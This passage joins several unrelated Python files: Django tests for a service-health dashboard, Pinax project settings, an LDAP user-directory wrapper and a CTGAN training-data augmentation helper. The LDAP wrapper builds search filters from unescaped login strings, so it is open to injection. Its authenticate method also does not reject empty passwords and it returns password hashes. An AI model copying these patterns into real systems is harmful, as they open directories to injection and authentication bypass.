    @mock.patch('celery.app.control.Control.inspect')
    def test_get_fails(self, inspect_mock):
        """
        The dashboard reports a problem when no Celery workers answer
        (inspect().stats() returns None).
        """
        inspect_mock().stats.return_value = None

        client = Client()
        response = client.get('/')

        self.assertEqual(200, response.status_code)
        self.assertEqual(
            'Oh no. Houston we have problemns', response.context['status'])

        # Only the celery informer flips to non-operational.
        expected = [
            {
                'name': 'database',
                'operational': True,
                'message': 'Your database is operational.',
                'url': '/database/'
            },
            {
                'name': 'postgres',
                'operational': True,
                'message': 'Your database is operational.',
                'url': '/postgres/'
            },
            {
                'name': 'storage',
                'operational': True,
                'message': 'Your FileSystemStorage is operational.',
                'url': '/storage/'
            },
            {
                'name': 'celery',
                'operational': False,
                'message': 'No running Celery workers were found.',
                'url': '/celery/'
            },
            {
                'name': 'cache',
                'operational': True,
                'message': 'Your cache system is operational.',
                'url': '/cache/'
            }
        ]
        self.assertEqual(response.context['result'], expected)
        self.assertEqual(200, response.status_code)
class InformerViewTest(TestCase):
    """
    Tests responses from Informer details
    """
    def setUp(self):
        # Fresh test client for each test.
        self.client = Client()

    def test_get(self):
        """
        Test if 'details' from a specific Informer has a expected data
        """
        response = self.client.get('/database/')

        self.assertEqual(200, response.status_code)
        self.assertEqual('Database', response.context['name'])
        self.assertTrue(response.context['operational'])
        self.assertEqual(
            'Your database is operational.', response.context['message'])
        self.assertTrue(isinstance(response.context['measures'], list))

    @mock.patch.object(Raw.objects, 'count')
    def test_get_fails(self, m_mock):
        """
        Test if with 'broken scenario', all goes bad
        """
        # The informer should report the failure, not propagate it.
        m_mock.side_effect = Raw.DoesNotExist('Boom')

        response = self.client.get('/database/')

        self.assertEqual(200, response.status_code)
        self.assertEqual('Database', response.context['name'])
        self.assertFalse(response.context['operational'])
        self.assertTrue(isinstance(response.context['measures'], list))
        self.assertEqual(
            'An error occured when trying access database: Boom',
            response.context['message'])
class MeasureViewTest(TestCase):
    """
    Tests to Measure View
    """

    def setUp(self):
        self.client = Client()

    def test_get(self):
        """
        Test if 'details' from a specific Informer has the expected data
        """
        # Seed one raw measurement so the view has something to render.
        RawFactory.create(indicator='Database', measure='availability')
        response = self.client.get('/database/availability/')
        self.assertEqual(200, response.status_code)

    @mock.patch.object(Raw.objects, 'filter')
    def test_get_fail(self, m_mock):
        """
        Test if with 'broken scenario', all goes bad
        """
        # Any ORM filter call fails, so the view falls back to its error text.
        m_mock.side_effect = Exception('Boom')
        response = self.client.get('/database/availability/')
        self.assertEqual(200, response.status_code)
        # The view reuses the same error string for both context keys.
        self.assertEqual(
            'error trying get indicator (Database) or measure (availability)',
            response.context['indicator'])
        self.assertEqual(
            'error trying get indicator (Database) or measure (availability)',
            response.context['measure'])
        self.assertTrue(isinstance(response.context['measures'], list))
class FeedViewTest(TestCase):
    """
    Tests for the RSS feed endpoint.
    """

    def test_get(self):
        """
        The feed endpoint responds with HTTP 200.
        """
        response = Client().get('/feed/')
        self.assertEqual(200, response.status_code)
| |
# -*- coding: utf-8 -*-
# Django settings for social pinax project.
import os.path
import posixpath
import pinax
PINAX_ROOT = os.path.abspath(os.path.dirname(pinax.__file__))
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))

# tells Pinax to use the default theme
PINAX_THEME = 'default'

DEBUG = True
TEMPLATE_DEBUG = DEBUG

# tells Pinax to serve media through django.views.static.serve.
SERVE_MEDIA = DEBUG

# NOTE(review): INTERNAL_IPS is assigned a second time further down this
# file with the identical value; one of the two definitions is redundant.
INTERNAL_IPS = (
    '127.0.0.1',
)

ADMINS = (
    # ('Your Name', 'your_email@domain.com'),
)

MANAGERS = ADMINS

# Old-style (single-database) Django DATABASE_* settings.
DATABASE_ENGINE = 'sqlite3' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'ado_mssql'.
DATABASE_NAME = 'dev.db' # Or path to database file if using sqlite3.
DATABASE_USER = '' # Not used with sqlite3.
DATABASE_PASSWORD = '' # Not used with sqlite3.
DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.
DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.

# Local time zone for this installation. Choices can be found here:
# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
# although not all variations may be possible on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'US/Eastern'

# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en'

SITE_ID = 1

# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False

# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'site_media', 'media')

# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = '/site_media/media/'

# Absolute path to the directory that holds static files like app media.
# Example: "/home/media/media.lawrence.com/apps/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'site_media', 'static')

# URL that handles the static files like app media.
# Example: "http://media.lawrence.com"
STATIC_URL = '/site_media/static/'

# Additional directories which hold static files
STATICFILES_DIRS = (
    ('social_project', os.path.join(PROJECT_ROOT, 'media')),
    ('pinax', os.path.join(PINAX_ROOT, 'media', PINAX_THEME)),
)

# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = posixpath.join(STATIC_URL, "admin/")

# Make this unique, and don't share it with anybody.
# NOTE(review): SECRET_KEY is empty here -- it must be overridden (e.g. in
# local_settings.py, imported at the end of this file) before deployment.
SECRET_KEY = ''

# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.load_template_source',
    'django.template.loaders.app_directories.load_template_source',
)

MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django_openid.consumer.SessionConsumer',
    'account.middleware.LocaleMiddleware',
    'django.middleware.doc.XViewMiddleware',
    'pagination.middleware.PaginationMiddleware',
    'django_sorting.middleware.SortingMiddleware',
    'djangodblog.middleware.DBLogMiddleware',
    'pinax.middleware.security.HideSensistiveFieldsMiddleware',
    'debug_toolbar.middleware.DebugToolbarMiddleware',
    'django.middleware.transaction.TransactionMiddleware',
)

ROOT_URLCONF = 'social_project.urls'

TEMPLATE_DIRS = (
    os.path.join(PROJECT_ROOT, "templates"),
    os.path.join(PINAX_ROOT, "templates", PINAX_THEME),
)

TEMPLATE_CONTEXT_PROCESSORS = (
    "django.core.context_processors.auth",
    "django.core.context_processors.debug",
    "django.core.context_processors.i18n",
    "django.core.context_processors.media",
    "django.core.context_processors.request",
    "pinax.core.context_processors.pinax_settings",
    "notification.context_processors.notification",
    "announcements.context_processors.site_wide_announcements",
    "account.context_processors.openid",
    "account.context_processors.account",
    "messages.context_processors.inbox",
    "friends_app.context_processors.invitations",
    "social_project.context_processors.combined_inbox_count",
)
COMBINED_INBOX_COUNT_SOURCES = (
    "messages.context_processors.inbox",
    "friends_app.context_processors.invitations",
    "notification.context_processors.notification",
)

INSTALLED_APPS = (
    # included
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.humanize',
    'django.contrib.markup',
    'pinax.templatetags',

    # external
    'notification', # must be first
    'django_openid',
    'emailconfirmation',
    'django_extensions',
    'robots',
    'friends',
    'mailer',
    'messages',
    'announcements',
    'oembed',
    'djangodblog',
    'pagination',
    # 'gravatar',
    'threadedcomments',
    'threadedcomments_extras',
    'wiki',
    'swaps',
    'timezones',
    'voting',
    'voting_extras',
    'tagging',
    'bookmarks',
    'blog',
    'ajax_validation',
    'photologue',
    'avatar',
    'flag',
    'microblogging',
    'locations',
    'uni_form',
    'django_sorting',
    'django_markup',
    'staticfiles',
    'debug_toolbar',

    # internal (for now)
    'analytics',
    'profiles',
    'account',
    'signup_codes',
    'tribes',
    'photos',
    'tag_app',
    'topics',
    'groups',

    'django.contrib.admin',
)

ABSOLUTE_URL_OVERRIDES = {
    "auth.user": lambda o: "/profiles/profile/%s/" % o.username,
}

MARKUP_FILTER_FALLBACK = 'none'
MARKUP_CHOICES = (
    ('restructuredtext', u'reStructuredText'),
    ('textile', u'Textile'),
    ('markdown', u'Markdown'),
    ('creole', u'Creole'),
)
WIKI_MARKUP_CHOICES = MARKUP_CHOICES

AUTH_PROFILE_MODULE = 'profiles.Profile'
NOTIFICATION_LANGUAGE_MODULE = 'account.Account'

ACCOUNT_OPEN_SIGNUP = True
ACCOUNT_REQUIRED_EMAIL = False
ACCOUNT_EMAIL_VERIFICATION = False

EMAIL_CONFIRMATION_DAYS = 2
EMAIL_DEBUG = DEBUG
CONTACT_EMAIL = "feedback@example.com"
SITE_NAME = "Pinax"
LOGIN_URL = "/account/login/"
LOGIN_REDIRECT_URLNAME = "what_next"

# NOTE(review): duplicate of the INTERNAL_IPS definition near the top of
# this file (identical value, so harmless, but one should be removed).
INTERNAL_IPS = (
    '127.0.0.1',
)

# Identity function standing in for Django's ugettext.
ugettext = lambda s: s
LANGUAGES = (
    ('en', u'English'),
)

# URCHIN_ID = "ua-..."

YAHOO_MAPS_API_KEY = "..."
class NullStream(object):
    """A write-only, file-like sink that silently discards its input."""

    def write(*args, **kwargs):
        # Accept any call signature (the bound instance arrives via *args)
        # and do nothing with it.
        return None

    # Alternative writer entry points are the same no-op.
    writeline = write
    writelines = write
# Docutils settings for the restructuredtext markup filter; warnings are
# routed into the NullStream defined above and thus discarded.
RESTRUCTUREDTEXT_FILTER_SETTINGS = {
    'cloak_email_addresses': True,
    'file_insertion_enabled': False,
    'raw_enabled': False,
    'warning_stream': NullStream(),
    'strip_comments': True,
}

# if Django is running behind a proxy, we need to do things like use
# HTTP_X_FORWARDED_FOR instead of REMOTE_ADDR. This setting is used
# to inform apps of this fact
BEHIND_PROXY = False

FORCE_LOWERCASE_TAGS = True

WIKI_REQUIRES_LOGIN = True

# Uncomment this line after signing up for a Yahoo Maps API key at the
# following URL: https://developer.yahoo.com/wsregapp/
# YAHOO_MAPS_API_KEY = ''

# local_settings.py can be used to override environment-specific settings
# like database and email that differ between development and production.
try:
    from local_settings import *
except ImportError:
    pass
| |
from __future__ import absolute_import
import logging
import random
import string
import yaml
from passlib.hash import ldap_salted_sha1
try:
from yaml import CSafeLoader as YAMLLoader
except ImportError:
from yaml import SafeLoader as YAMLLoader
import ldap
from ldap import dn, modlist, SERVER_DOWN
# Module-level logger.
# NOTE(review): getLogger(__file__) names the logger after the file path
# rather than the dotted module name; getLogger(__name__) is the usual
# convention -- confirm no logging config keys on the path before changing.
log = logging.getLogger(__file__)
class UnknownLdapUser(Exception):
    """ Raised when an LDAP search returns no matching user. """
class LdapWrapper(object):
    """Simple wrapper around a python-ldap connection, configured from YAML.

    The YAML file supplies the server URL, the search bases (users, admins,
    teams), the system bind credentials and the attribute names used by the
    directory schema.  Every search method rebinds with the system account
    first; ``authenticate`` then rebinds with the user's own credentials.
    """

    _url = None
    _conn = None
    _base = None
    _filter = None

    def __init__(self, filename):
        """Load settings from *filename* (YAML) and bind the system account."""
        with open(filename) as fdesc:
            conf = yaml.load(fdesc, YAMLLoader)
        self._url = conf['ldap_url']
        self._base = conf['basedn']
        self._filter = conf['search_filter']
        # Schema-specific attribute names.
        self.mail_attr = conf['mail_attr']
        self.firstname_attr = conf['firstname_attr']
        self.lastname_attr = conf['lastname_attr']
        self.login_attr = conf['login_attr']
        self.manager_attr = conf['manager_attr']
        self.country_attr = conf['country_attr']
        # Dedicated subtrees plus the system bind account.
        self.admin_dn = conf['admin_dn']
        self.system_DN = conf['system_dn']
        self.system_password = conf['system_pass']
        self.team_dn = conf['team_dn']
        self._conn = ldap.initialize(self._url)
        self._bind(self.system_DN, self.system_password)
        log.info('Ldap wrapper initialized')

    def _bind(self, dn, password):
        """ bind a user in ldap with given password
        ldap does not support unicode for binding
        so we must cast password to utf-8
        """
        log.debug('binding with dn: %s' % dn)
        try:
            self._conn.simple_bind_s(dn, password.encode('utf-8'))
        except SERVER_DOWN:
            # The connection may have gone stale: reconnect once and retry.
            self._conn = ldap.initialize(self._url)
            self._conn.simple_bind_s(dn, password.encode('utf-8'))

    def _search(self, what, retrieve):
        """Search the user base; *retrieve* lists the attributes wanted."""
        # rebind with system dn
        self._bind(self.system_DN, self.system_password)
        log.debug('searching: %s for: %s' % (what, retrieve))
        return self._conn.search_s(self._base, ldap.SCOPE_SUBTREE, what,
                                   retrieve)

    def _search_admin(self, what, retrieve):
        """Search the admin subtree."""
        # rebind with system dn
        self._bind(self.system_DN, self.system_password)
        return self._conn.search_s(self.admin_dn, ldap.SCOPE_SUBTREE, what,
                                   retrieve)

    def _search_team(self, what, retrieve):
        """Search the team subtree."""
        # rebind with system dn
        self._bind(self.system_DN, self.system_password)
        return self._conn.search_s(self.team_dn, ldap.SCOPE_SUBTREE, what,
                                   retrieve)

    def _search_by_item(self, item):
        """Search one user by filter fragment and parse the first result.

        :raises UnknownLdapUser: when the search returns nothing
        """
        required_fields = ['cn', 'mail', 'uid', 'givenName', 'sn', 'manager',
                           'ou', 'userPassword']
        res = self._search(self._filter % item, required_fields)
        if not res:
            raise UnknownLdapUser
        USER_DN, entry = res[0]
        return self.parse_ldap_entry(USER_DN, entry)

    def search_user_by_login(self, login):
        """Find the user whose cn contains *login*."""
        item = 'cn=*%s*' % login
        return self._search_by_item(item)

    def search_user_by_dn(self, user_dn):
        """Find a user from a full dn, by extracting its cn first."""
        item = 'cn=*%s*' % self._extract_cn(user_dn)
        return self._search_by_item(item)

    def _extract_country(self, user_dn):
        """ Get country from a user dn (None when no country RDN found). """
        for rdn in dn.str2dn(user_dn):
            rdn = rdn[0]
            if rdn[0] == self.country_attr:
                return rdn[1]

    def _extract_cn(self, user_dn):
        """ Get cn from a user dn (None when no login RDN found). """
        for rdn in dn.str2dn(user_dn):
            rdn = rdn[0]
            if rdn[0] == self.login_attr:
                return rdn[1]

    def parse_ldap_entry(self, user_dn, entry):
        """
        Format ldap entry and parse user_dn to output dict with expected values

        Returns None when either argument is empty.  NOTE: ``.pop()``
        consumes the attribute value lists held in *entry*.
        """
        if not user_dn or not entry:
            return
        data = {
            'email': entry[self.mail_attr].pop(),
            'lastname': entry[self.lastname_attr].pop(),
            'login': entry[self.login_attr].pop(),
            'manager_dn': '',
            'firstname': '',
        }
        if self.manager_attr in entry:
            data['manager_dn'] = entry[self.manager_attr].pop()
        if self.firstname_attr in entry:
            data['firstname'] = entry[self.firstname_attr].pop()
        if 'ou' in entry:
            data['ou'] = entry['ou'].pop()
        if 'uid' in entry:
            data['uid'] = entry['uid'].pop()
        # save user dn
        data['dn'] = user_dn
        data['country'] = self._extract_country(user_dn)
        # BUGFIX: this previously called _extract_country(), which stored the
        # manager's *country* under 'manager_cn' instead of the manager's cn.
        data['manager_cn'] = self._extract_cn(data['manager_dn'])
        data['userPassword'] = entry['userPassword'].pop()
        return data

    def authenticate(self, login, password):
        """ Authenticate user using given credentials """
        user_data = self.search_user_by_login(login)
        # try to bind with password
        self._bind(user_data['dn'], password)
        return user_data

    def add_user(self, user, password, unit=None, uid=None):
        """ Add new user into ldap directory and return its dn. """
        # The dn of our new entry/object.  (Local name shadows the imported
        # ldap.dn module inside this method only.)
        dn = 'cn=%s,c=%s,%s' % (user.login, user.country, self._base)
        log.info('create user %s in ldap' % dn)
        # A dict to help build the "body" of the object
        attrs = {}
        attrs['objectClass'] = ['inetOrgPerson', 'top']
        attrs['employeeType'] = ['Employee']
        attrs['cn'] = [user.login.encode('utf-8')]
        attrs['givenName'] = [user.firstname.encode('utf-8')]
        attrs['sn'] = [user.lastname.encode('utf-8')]
        if uid:
            attrs['uid'] = [uid.encode('utf-8')]
        attrs['mail'] = [user.email.encode('utf-8')]
        if not unit:
            unit = 'development'
        attrs['ou'] = [unit.encode('utf-8')]
        attrs['userPassword'] = [hashPassword(password)]
        attrs['manager'] = [user.manager_dn.encode('utf-8')]
        # Convert our dict for the add-function using modlist-module
        ldif = modlist.addModlist(attrs)
        log.info('sending for dn %r: %r' % (dn, ldif))
        # rebind with system dn
        self._bind(self.system_DN, self.system_password)
        # Do the actual synchronous add-operation to the ldapserver
        self._conn.add_s(dn, ldif)
        # return the new dn to display it to the administrator
        return dn

    def update_user(self, user, password=None, unit=None):
        """ Update user params in ldap directory """
        # convert fields to ldap fields
        # retrieve them from model as it was updated before
        fields = {
            'mail': [user.email.encode('utf-8')],
            'givenName': [user.firstname.encode('utf-8')],
            'sn': [user.lastname.encode('utf-8')],
            'manager': [user.manager_dn.encode('utf-8')],
        }
        if password:
            fields['userPassword'] = password
        if unit:
            fields['ou'] = [unit.encode('utf-8')]
        # dn of object we want to update
        dn = 'cn=%s,c=%s,%s' % (user.login, user.country, self._base)
        log.info('updating user %s from ldap' % dn)
        # retrieve current user information
        required = ['objectClass', 'employeeType', 'cn', 'givenName', 'sn',
                    'manager', 'mail', 'ou', 'uid', 'userPassword']
        item = 'cn=*%s*' % user.login
        res = self._search(self._filter % item, required)
        USER_DN, entry = res[0]
        old = {}
        new = {}
        # for each field to be updated, pair the current and target values
        for field in fields:
            # get old value
            old[field] = entry.get(field, '')
            # set new value
            new[field] = fields[field]
        # Convert place-holders for modify-operation using modlist-module
        ldif = modlist.modifyModlist(old, new)
        if ldif:
            # rebind with system dn
            self._bind(self.system_DN, self.system_password)
            log.info('sending for dn %r: %r' % (dn, ldif))
            # Do the actual modification if needed
            self._conn.modify_s(dn, ldif)

    def delete_user(self, user_dn):
        """ Soft-delete: mark the user's employeeType as 'Inactive'. """
        log.info('deleting user %s from ldap' % user_dn)
        # retrieve current user information
        required = ['employeeType']
        item = 'cn=*%s*' % self._extract_cn(user_dn)
        res = self._search(self._filter % item, required)
        USER_DN, entry = res[0]
        old = {
            'employeeType': entry['employeeType'],
        }
        new = {
            'employeeType': 'Inactive',
        }
        # Convert place-holders for modify-operation using modlist-module
        ldif = modlist.modifyModlist(old, new)
        if ldif:
            # rebind with system dn
            self._bind(self.system_DN, self.system_password)
            log.info('sending for dn %r: %r' % (user_dn, ldif))
            # Do the actual modification if needed
            self._conn.modify_s(user_dn, ldif)

    def update_team(self, team, members):
        """ Replace team member list in the ldap directory """
        # dn of object we want to update
        dn = 'cn=%s,%s' % (team, self.team_dn)
        log.info('updating team %s from ldap' % team)
        # retrieve current team members
        team_members = self.get_team_members(team)
        old = {'member': team_members}
        new = {'member': members}
        # Convert place-holders for modify-operation using modlist-module
        ldif = modlist.modifyModlist(old, new)
        if ldif:
            # rebind with system dn
            self._bind(self.system_DN, self.system_password)
            log.info('sending for dn %r: %r' % (dn, ldif))
            # Do the actual modification if needed
            self._conn.modify_s(dn, ldif)

    def get_hr_by_country(self, country):
        """ Get hr user data of *country*, from the admin subtree.

        Falls back to the last admin member examined when no admin matches
        the country.  NOTE(review): assumes the admin search returns at
        least one group with members -- otherwise ``entry`` is unbound.
        """
        what = '(member=*)'
        results = self._search_admin(what, None)
        for USER_DN, res_entry in results:
            for entry in res_entry['member']:
                item = self._extract_country(entry)
                if item == country:
                    # found valid hr user for this country
                    login = self._extract_cn(entry)
                    user_data = self.search_user_by_login(login)
                    return user_data
        # security if no admin per country found, take the last one
        login = self._extract_cn(entry)
        user_data = self.search_user_by_login(login)
        return user_data

    def list_ou(self):
        """ Retrieve available organisational units.

        NOTE(review): this actually returns the set of DNs of entries with
        members under the team subtree, not 'ou' attribute values.
        """
        # rebind with system dn
        self._bind(self.system_DN, self.system_password)
        # retrieve all team entries
        required = None
        item = '(member=*)'
        res = self._search_team(item, required)
        units = []
        for USER_DN, entry in res:
            units.append(USER_DN)
        # only return unique entries
        return set(units)

    def list_teams(self):
        """ Retrieve available teams as {team cn: member list} """
        # rebind with system dn
        self._bind(self.system_DN, self.system_password)
        # retrieve all teams so we can extract members
        required = None
        item = '(member=*)'
        res = self._search_team(item, required)
        teams = {}
        for USER_DN, entry in res:
            # skip the special manager groups
            if 'manager' not in entry['cn'][0]:
                teams[entry['cn'][0]] = entry['member']
        return teams

    def list_manager(self):
        """ Retrieve available managers dn (sorted) """
        # rebind with system dn
        self._bind(self.system_DN, self.system_password)
        # the manager group is the first team entry whose cn starts with
        # "manager"; its members are the manager DNs
        required = None
        item = '(&(member=*)(cn=manager*))'
        res = self._search_team(item, required)
        USER_DN, entry = res[0]
        managers = entry['member']
        # only return unique entries
        return sorted(managers)

    def list_admin(self):
        """ Retrieve available admins dn (sorted) """
        # rebind with system dn
        self._bind(self.system_DN, self.system_password)
        # the first admin group's members are the admin DNs
        required = None
        item = '(member=*)'
        res = self._search_admin(item, required)
        USER_DN, entry = res[0]
        managers = entry['member']
        # only return unique entries
        return sorted(managers)

    def get_users_units(self):
        """ Retrieve ou for all users, as {user dn: {'ou': value}} """
        # rebind with system dn
        self._bind(self.system_DN, self.system_password)
        # retrieve all users so we can extract OU
        required = ['ou']
        item = 'cn=*'
        res = self._search(item, required)
        users_units = {}
        for USER_DN, entry in res:
            if USER_DN not in users_units:
                users_units[USER_DN] = {}
            if 'ou' in entry:
                users_units[USER_DN]['ou'] = entry['ou'][0]
        return users_units

    def get_team_members(self, team):
        """ Retrieve team members list of the first team matching *team* """
        # rebind with system dn
        self._bind(self.system_DN, self.system_password)
        # retrieve all teams so we can extract members
        required = None
        item = '(&(cn=*%s*)(member=*))' % team
        res = self._search_team(item, required)
        _, entry = res[0]
        return entry['member']
class LdapCache(object):
    """Process-wide singleton handle on the configured LdapWrapper.

    ``configure()`` must run once at startup; afterwards every
    ``LdapCache()`` call hands back the same wrapper instance.
    """

    _instance = None

    def __new__(cls, *args, **kwargs):
        instance = cls._instance
        if not instance:
            raise RuntimeError('Ldap is not initialized')
        return instance

    @classmethod
    def configure(cls, settings):
        """Build and memoize the shared wrapper from a settings file path."""
        cls._instance = cls.from_config(settings)

    @classmethod
    def from_config(cls, config, **kwargs):
        """
        Return a Ldap client object configured from the given configuration.
        """
        return LdapWrapper(config)
def hashPassword(password):
    """Hash *password* into LDAP SSHA ({SSHA}...) form via passlib."""
    hashed = ldap_salted_sha1.encrypt(password)
    return hashed
def randomstring(length=8):
    """ Generates a random ascii string of letters and digits.

    :param length: number of characters to generate (default 8)
    :return: str of ascii letters and digits

    Uses ``random.SystemRandom`` (OS CSPRNG) because the result is used as
    a credential, and ``string.ascii_letters`` / ``range`` so the code runs
    on both Python 2 and Python 3 (``string.letters`` and ``xrange`` are
    Python 2 only).
    """
    chars = string.ascii_letters + string.digits
    rng = random.SystemRandom()
    # Generate string from population
    return ''.join(rng.choice(chars) for _ in range(length))
| |
import gc
from typing import List
import numpy as np
import pandas as pd
from ctgan import CTGANSynthesizer
from sklearn.model_selection import StratifiedKFold
from model import Model
def save_dict_to_file(dic: dict, path: str, save_raw=False) -> None:
    """
    Save dict values into txt file
    :param dic: Dict with values
    :param path: Path to .txt file
    :param save_raw: If True, write str(dic) verbatim; otherwise write each
        key immediately followed by its value and a blank line
    :return: None
    """
    # "with" guarantees the handle is closed even if a write fails
    # (the original leaked the handle on exceptions).
    with open(path, "w") as f:
        if save_raw:
            f.write(str(dic))
        else:
            for k, v in dic.items():
                f.write(str(k))
                f.write(str(v))
                f.write("\n\n")
def save_exp_to_file(dic: dict, path: str) -> None:
    """
    Append one experiment row to a tab-separated log file.

    A tab-joined header line (the dict keys) is written first when the file
    is empty; every call then appends a tab-joined row of the dict values.

    :param dic: Dict with values
    :param path: Path to .txt file
    :return: None
    """
    # "with" guarantees the handle is closed even if a write fails
    # (the original leaked the handle on exceptions).
    with open(path, "a+") as f:
        keys = dic.keys()
        vals = [str(val) for val in dic.values()]
        # tell() == 0 means the file is empty: emit the header exactly once
        if f.tell() == 0:
            header = "\t".join(keys)
            f.write(header + "\n")
        row = "\t".join(vals)
        f.write(row + "\n")
def cat_cols_info(
    X_train: pd.DataFrame, X_test: pd.DataFrame, cat_cols: List[str]
) -> dict:
    """
    Summarise categorical columns: cardinality in train and test, plus how
    many (and what fraction of) test values never appear in train.

    :param X_train: Train dataframe
    :param X_test: Test dataframe
    :param cat_cols: List of categorical columns
    :return: Dict of per-column summaries keyed by column name
    """
    summary = {}
    for column in cat_cols:
        seen_in_train = set(X_train[column])
        novel_count = len(set(X_test[column]) - seen_in_train)
        novel_fraction = np.mean(
            X_test[column].apply(lambda value: value not in seen_in_train)
        )
        summary[column] = {
            "num_uniq_train": X_train[column].nunique(),
            "num_uniq_test": X_test[column].nunique(),
            "number_of_new_test": novel_count,
            "fraction_of_new_test": novel_fraction,
        }
    return summary
def adversarial_test(left_df, right_df, cat_cols):
    """
    Train an adversarial model that tries to tell the two frames apart
    (left labelled 0, right labelled 1) and report its ROC AUC.

    :param left_df: dataframe
    :param right_df: dataframe
    :param cat_cols: List of categorical columns
    :return: trained model
    """
    # Shuffle copies so the callers' frames are left untouched.
    lhs = left_df.copy().sample(frac=1).reset_index(drop=True)
    rhs = right_df.copy().sample(frac=1).reset_index(drop=True)
    # Equalise the class sizes by truncating to the smaller frame.
    lhs = lhs.head(rhs.shape[0])
    rhs = rhs.head(lhs.shape[0])
    lhs["gt"] = 0
    rhs["gt"] = 1
    combined = pd.concat([lhs, rhs])
    lgb_model = Model(
        cat_validation="Single",
        encoders_names=("OrdinalEncoder",),
        cat_cols=cat_cols,
        model_validation=StratifiedKFold(n_splits=3, shuffle=True, random_state=42),
        model_params={
            "metrics": "AUC",
            "max_depth": 2,
            "max_bin": 100,
            "n_estimators": 500,
            "learning_rate": 0.02,
            "random_state": 42,
        },
    )
    train_score, val_score, avg_num_trees = lgb_model.fit(
        combined.drop("gt", axis=1), combined["gt"]
    )
    print(
        "ROC AUC adversarial: train %.2f%% val %.2f%%"
        % (train_score * 100.0, val_score * 100.0)
    )
    return lgb_model
def extend_gan_train(x_train, y_train, x_test, cat_cols, gen_x_times=1.2, epochs=300):
    """
    Extends train by generating new data by GAN.

    A CTGAN is fitted on train (with the target appended as a column), an
    oversized synthetic sample is drawn, clipped to the 2%-98% quantile range
    of the test numeric columns, ranked by test-likeness with an adversarial
    model, and the ``gen_x_times * len(x_train)`` most test-like rows are
    appended to train.

    :param x_train: train dataframe
    :param y_train: target for train dataframe
    :param x_test: test dataframe
    :param cat_cols: List of categorical columns
    :param gen_x_times: Factor for which initial dataframe should be increased
    :param epochs: Number of epoch max to train the GAN
    :return: tuple of (extended train dataframe, extended target series)
    """
    if gen_x_times == 0:
        raise ValueError("Passed gen_x_times with value 0!")
    # BUGFIX: work on a copy so the caller's dataframe does not permanently
    # grow a "target" column as a side effect.
    x_train = x_train.copy()
    x_train["target"] = y_train
    # Oversampling factor relative to the train size.
    # NOTE(review): this is 0 when x_test is much smaller than x_train --
    # confirm callers guarantee len(x_test) >= len(x_train) / 1.1.
    x_test_bigger = int(1.1 * x_test.shape[0] / x_train.shape[0])
    ctgan = CTGANSynthesizer()
    ctgan.fit(x_train, cat_cols, epochs=epochs)
    generated_df = ctgan.sample((x_test_bigger) * x_train.shape[0])
    # Restore the original column dtypes on the generated frame.
    data_dtype = x_train.dtypes.values
    for i in range(len(generated_df.columns)):
        generated_df[generated_df.columns[i]] = generated_df[
            generated_df.columns[i]
        ].astype(data_dtype[i])
    # Mix in bootstrapped original rows so the adversarial ranking below can
    # also select real samples.
    generated_df = pd.concat(
        [
            x_train.sample(frac=(x_test_bigger), replace=True, random_state=42),
            generated_df,
        ]
    ).reset_index(drop=True)
    # Keep only rows whose numeric values fall inside the 2%-98% quantile
    # range observed in the test set.
    num_cols = [col for col in x_train.columns if "num" in col]
    for num_col in num_cols:
        min_val = x_test[num_col].quantile(0.02)
        max_val = x_test[num_col].quantile(0.98)
        generated_df = generated_df.loc[
            (generated_df[num_col] >= min_val) & (generated_df[num_col] <= max_val)
        ]
    generated_df = generated_df.reset_index(drop=True)
    # Rank candidate rows by how much they resemble the test distribution.
    ad_model = adversarial_test(x_test, generated_df.drop("target", axis=1), cat_cols)
    generated_df["test_similarity"] = ad_model.predict(
        generated_df.drop("target", axis=1), return_shape=False
    )
    generated_df.sort_values("test_similarity", ascending=False, inplace=True)
    generated_df = generated_df.head(int(gen_x_times * x_train.shape[0]))
    x_train = pd.concat(
        [x_train, generated_df.drop("test_similarity", axis=1)], axis=0
    ).reset_index(drop=True)
    del generated_df
    gc.collect()
    return x_train.drop("target", axis=1), x_train["target"]
def extend_from_original(x_train, y_train, x_test, cat_cols, gen_x_times=1.2):
    """
    Extends train by bootstrapping rows from the original train data.

    Like :func:`extend_gan_train` but without a GAN: rows are resampled from
    train, clipped to the 2%-98% quantile range of the test numeric columns,
    ranked by test-likeness with an adversarial model, and the
    ``gen_x_times * len(x_train)`` most test-like rows are appended.

    :param x_train: train dataframe
    :param y_train: target for train dataframe
    :param x_test: test dataframe
    :param cat_cols: List of categorical columns
    :param gen_x_times: Factor for which initial dataframe should be increased
    :return: tuple of (extended train dataframe, extended target series)
    """
    if gen_x_times == 0:
        raise ValueError("Passed gen_x_times with value 0!")
    # BUGFIX: work on a copy so the caller's dataframe does not permanently
    # grow a "target" column as a side effect.
    x_train = x_train.copy()
    x_train["target"] = y_train
    # Oversampling factor relative to the train size.
    # NOTE(review): this is 0 when x_test is much smaller than x_train --
    # confirm callers guarantee len(x_test) >= len(x_train) / 1.1.
    x_test_bigger = int(1.1 * x_test.shape[0] / x_train.shape[0])
    generated_df = x_train.sample(frac=x_test_bigger, replace=True, random_state=42)
    # Keep only rows whose numeric values fall inside the 2%-98% quantile
    # range observed in the test set.
